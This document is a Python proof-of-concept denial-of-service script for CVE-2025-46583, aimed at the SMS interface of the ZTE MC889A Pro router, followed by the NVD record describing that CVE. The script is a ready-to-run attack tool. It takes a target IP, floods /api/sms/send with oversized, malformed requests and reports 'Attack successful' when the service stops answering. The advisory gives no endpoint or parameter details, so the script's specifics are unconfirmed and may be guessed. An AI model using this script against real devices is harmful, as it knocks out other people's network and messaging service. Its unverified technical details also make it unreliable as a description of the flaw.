CVE-2025-46583

# CVE-2025-46583 PoC - ZTE MC889A Pro SMS DoS # Description: Denial of Service via SMS service interface due to insufficient input validation import requests import sys import time def send_malicious_sms(target_ip, payload_size=10000): """ Send malformed SMS request to trigger DoS condition """ # Construct malicious SMS request with oversized/ malformed payload sms_endpoint = f"http://{target_ip}/api/sms/send" # Malformed payload that triggers DoS malicious_payload = { "phone_number": "1234567890", "message": "A" * payload_size, # Oversized message "encoding": "invalid_encoding", # Invalid encoding parameter "timestamp": None # Null timestamp } headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } try: response = requests.post(sms_endpoint, json=malicious_payload, headers=headers, timeout=10) print(f"[*] Request sent to {sms_endpoint}") print(f"[*] Response status: {response.status_code}") return response.status_code == 200 or response.status_code == 500 except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return False def verify_dos(target_ip): """ Verify if SMS service is unavailable after attack """ sms_endpoint = f"http://{target_ip}/api/sms/status" try: response = requests.get(sms_endpoint, timeout=10) if response.status_code != 200: print("[+] DoS condition confirmed - SMS service unavailable") return True except: print("[+] DoS condition confirmed - SMS service unavailable") return True return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-46583_poc.py <target_ip>") sys.exit(1) target = sys.argv[1] print(f"[*] Starting DoS attack on {target}") print(f"[*] Target: ZTE MC889A Pro SMS Service") # Send multiple malformed requests for i in range(10): print(f"[*] Sending request {i+1}/10") send_malicious_sms(target) time.sleep(0.5) # Verify DoS condition time.sleep(2) if verify_dos(target): print("[+] Attack successful - SMS service DoS achieved")

{"cve": {"id": "CVE-2025-46583", "sourceIdentifier": "[email protected]", "published": "2025-10-27T10:15:39.210", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a Denial of Service（DoS）vulnerability in the ZTE MC889A Pro product. Due to insufficient validation of the input parameters of the Short Message Service interface, allowing an attacker to exploit it to carry out a DoS attack."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-116"}]}], "references": [{"url": "https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/2594779029512220894", "source": "[email protected]"}]}}